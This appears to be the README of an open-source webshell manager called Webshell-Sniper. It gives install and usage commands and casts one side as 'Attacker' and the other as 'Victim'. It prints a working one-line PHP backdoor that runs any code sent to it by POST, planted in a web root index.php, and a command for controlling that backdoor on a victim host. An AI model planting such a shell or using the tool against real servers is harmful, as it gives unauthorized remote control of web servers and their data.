A webshell manager via terminal
Usage :
python webshell-sniper.py [URL] [METHOD] [AUTH]
Example :
python webshell-sniper.py http://127.0.0.1/c.php POST c
Author :
WangYihang <wangyihanger@gmail.com>
# cat /var/www/html/index.php
<?php eval($_POST['s3cr3t']);?>
# python webshell-sniper.py http://victim.com/index.php POST s3cr3t
...
git clone https://github.com/WangYihang/Webshell-Sniper
cd Webshell-Sniper
pip install -r requirements.txt
v1.1.2
Enviroment :
Attacker :
Linux
python 2.7
Victim :
apache 2.4
php 7.0
- This tool only support to run on unix-like system.
- It is able to help user control web server which is running PHP or MySQL.
This project exists thanks to all the people who contribute.
Thank you to all our backers! 🙏 [Become a backer]
Support this project by becoming a sponsor. Your logo will show up here with a link to your website. [Become a sponsor]